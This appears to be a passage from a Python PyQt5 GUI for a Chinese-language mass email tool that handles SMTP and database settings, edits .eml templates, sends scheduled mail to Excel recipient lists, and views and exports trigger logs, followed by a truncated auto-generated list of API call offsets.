self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6)
self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1)
self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6)
self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1)
self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2)
def display_smtp_setting(self):
self.clear_layout(self.right_layout)
        # Add widgets on the right side
labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2)
self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2)
def display_db_setting(self):
self.clear_layout(self.right_layout)
        # Add widgets on the right side
labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2)
def display_update_eml(self):
self.clear_layout(self.right_layout)
labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"]
for i, label in enumerate(labels):
self.label = QLabel(label)
self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7)
self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7)
self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7)
self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2)
def display_logs(self):
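        # Fetch trigger logs from the database and list them in the table on the right.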
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
self.clear_layout(self.right_layout)
self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8)
self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1)
self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2)
self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3)
self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2)
try:
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database()
self.data_logs = db.get_logs()
self.data_temp_logs = deepcopy(self.data_logs)
if self.data_logs:
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
col_lst = list(self.data_logs[0].keys())
self.cmb_logs_choice.clear()
self.cmb_logs_choice.addItems(col_lst)
self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tbw_logs.setHorizontalHeaderLabels(col_lst)
for i in range(row_num):
row_data = list(self.data_logs[i].values())
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(i, j, item)
except:
QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)
else:
db.__disconnect__()
def get_items_from_layout(self, layout):
return [layout.itemAt(i).widget() for i in range(layout.count())]
def save_data(self, data):
items = self.get_items_from_layout(self.right_layout)
data.clear()
try:
for item in items:
if type(item) == type(QLineEdit()):
data.append(item.text())
elif type(item) == type(QCheckBox()):
data.append(item.isChecked())
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
print(data)
def clear_layout(self, layout):
for i in reversed(range(layout.count())):
layout.itemAt(i).widget().setParent(None)
def open_eml(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
obj.setText(file_name)
def open_excel(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)")
obj.setText(file_name)
def open_word(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)")
obj.setText(file_name)
def open_annex(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)")
org_files = obj.text()
all_files = org_files + ',' + file_name if org_files else file_name
obj.setText(all_files)
def print_html(self, index):
if index:
self.in_edit_web.setHtml(self.in_edit_html.toPlainText())
def send_mail(self):
eml_type = self.in_eml_type.text()
eml_file = self.in_eml_template.text()
user_group = self.in_recipient_group.text()
mail_excel = self.in_recipient_excel.text()
annex_file = self.in_annex_file.text()
url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com'
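        # If the scheduler checkbox is ticked, hand the job to the scheduling client; otherwise send immediately through SMTP.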
try:
if self.cb_scheduler.isChecked():
my_time = self.in_scheduler.text()+':00'
client = Client()
client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time)
QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok)
else:
sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp()
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database()
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url)
sm.close()
db.__disconnect__()
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def show_sub_win(self):
if self.data_smtp:
self.sub_win = SubWindow()
self.sub_win.btn_send.clicked.connect(self.send_test)
self.sub_win.show()
else:
QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)
def send_test(self):
try:
if self.data_smtp:
mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3])
mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5])
error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text())
mailserver.close()
if error:
                    QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWarning: '+error, QMessageBox.Ok)
else:
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
self.sub_win.in_recipient.clear()
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def eml_open(self):
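        # Load an existing .eml template and populate the sender, subject and HTML fields.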
self.in_edit_html.clear()
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
if not file_name:
return
header, html = gm.get_msg(file_name)
self.in_edit_sender.setText(header[2])
self.in_edit_sender_name.setText(header[1])
self.in_edit_subject.setText(header[0])
self.in_edit_html.insertPlainText(html)
def eml_save(self):
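        # Collect the header fields and HTML body, optionally attach files, and write the message out as an .eml file.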
header, msg = [], ''
header.append(self.in_edit_subject.text())
header.append(self.in_edit_sender_name.text())
header.append(self.in_edit_sender.text())
header.append('<EMAIL>')
annex_file = self.in_edit_annex.text().split(',')
html = self.in_edit_html.toPlainText()
if not any(header[:3]) or not html:
return
try:
msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html)
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)')
with open(file_path, 'w') as outfile:
gen = generator.Generator(outfile)
gen.flatten(msg)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
def eml_reset(self):
items = self.get_items_from_layout(self.right_layout)
for item in items:
if type(item) == type(QLineEdit()):
item.clear()
self.cb_edit_annex.setChecked(False)
self.in_edit_html.clear()
def logs_change(self):
if not self.data_logs or not self.in_logs_data.text():
return
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
# header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'}
condition = self.cmb_logs_choice.currentText()
content = self.in_logs_data.text()
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
# self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
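        # Filter rows by the selected column; 'date' matches by substring, other columns need an exact match.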
for i in range(row_num):
switch = False
if condition == 'date' and content in str(self.data_logs[i][condition]):
switch = True
elif self.data_logs[i][condition] == content:
switch = True
if switch:
self.tbw_logs.insertRow(self.tbw_logs.rowCount())
row_data = list(self.data_logs[i].values())
self.data_temp_logs.append(self.data_logs[i])
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item)
def logs_download(self):
if self.data_temp_logs:
try:
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)')
if not file_path:
return
df = DataFrame(self.data_temp_logs)
df.to_excel(file_path, index=False)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
else:
QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok)
def quit_act(self):
        # sender is the object that emitted the signal
sender = self.sender()
print(sender.text() + '键被按下')
qApp = QApplication.instance()
qApp.quit()
def main():
app = QApplication(sys.argv)
gui = MailserverUi()
gui.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main() | [
"PyQt5.QtGui.QColor",
"PyQt5.QtWidgets.QApplication",
"copy.deepcopy",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"PyQt5.QtWidgets.QTableWidget",
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QFileDialog.getSaveFileName",
"email.generator.Generator",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QDateTime.currentDateTime",
"qdarkstyle.load_stylesheet_pyqt5",
"GenAndSendMail.insert_send_mail",
"PyQt5.QtWidgets.QLabel",
"pandas.DataFrame",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QApplication.instance",
"mylibrary.genmail.get_msg",
"PyQt5.QtWebEngineWidgets.QWebEngineView",
"PyQt5.QtWidgets.QMessageBox.information",
"pyqtgraph.setConfigOptions",
"PyQt5.QtWidgets.QGridLayout",
"server.sendmail.Smtp",
"server.client.Client",
"PyQt5.QtWidgets.QTabWidget",
"PyQt5.QtWidgets.QCheckBox",
"mylibrary.genmail.gen_eml",
"pyqtgraph.GraphicsLayoutWidget",
"pyqtgraph.setConfigOption",
"server.database.Database",
"PyQt5.QtWidgets.QMessageBox.warning"
] | [((22731, 22753), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (22743, 22753), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((986, 999), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (997, 999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1196, 1207), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (1205, 1207), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1298, 1315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""寄送"""'], {}), "('寄送')\n", (1309, 1315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1472, 1512), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""background"""', '"""#19232D"""'], {}), "('background', '#19232D')\n", (1487, 1512), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1521, 1555), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""foreground"""', '"""d"""'], {}), "('foreground', 'd')\n", (1536, 1555), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1564, 1596), 'pyqtgraph.setConfigOptions', 'setConfigOptions', ([], {'antialias': '(True)'}), '(antialias=True)\n', (1580, 1596), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((2553, 2562), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2560, 2562), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2613, 2626), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2624, 2626), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2754, 2763), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2761, 2763), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2847, 2860), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2858, 2860), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2961, 2970), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', 
(2968, 2970), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3056, 3069), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (3067, 3069), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3432, 3451), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""發送信件"""'], {}), "('發送信件')\n", (3443, 3451), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3542, 3561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""系統設定"""'], {}), "('系統設定')\n", (3553, 3561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3649, 3669), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""資料庫設定"""'], {}), "('資料庫設定')\n", (3660, 3669), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3761, 3780), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""修改樣板"""'], {}), "('修改樣板')\n", (3772, 3780), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3878, 3901), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""\x08觸發明細"""'], {}), "('\\x08觸發明細')\n", (3889, 3901), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3993, 4014), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""下載觸發明細"""'], {}), "('下載觸發明細')\n", (4004, 4014), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4106, 4123), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""退出"""'], {}), "('退出')\n", (4117, 4123), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4674, 4685), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4683, 4685), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4841, 4855), 'PyQt5.QtWidgets.QTableWidget', 
'QTableWidget', ([], {}), '()\n', (4853, 4855), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5013, 5035), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ([], {}), '()\n', (5033, 5035), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((5158, 5169), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5167, 5169), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5201, 5212), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5210, 5212), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5243, 5260), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5254, 5260), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5384, 5395), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5393, 5395), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5430, 5441), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5439, 5441), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5478, 5495), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5489, 5495), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5625, 5636), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5634, 5636), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5667, 5684), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5678, 5684), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5984, 5999), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (5993, 5999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, 
QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6034, 6051), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (6045, 6051), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6166, 6177), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6175, 6177), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6206, 6217), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6215, 6217), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6246, 6257), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6255, 6257), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6290, 6301), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6299, 6301), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6329, 6344), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (6338, 6344), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6373, 6384), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6382, 6384), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6414, 6431), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6425, 6431), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6544, 6561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""測試"""'], {}), "('測試')\n", (6555, 6561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6670, 6681), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6679, 6681), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, 
QHeaderView\n'), ((6708, 6719), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6717, 6719), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6746, 6757), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6755, 6757), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6788, 6799), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6797, 6799), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, 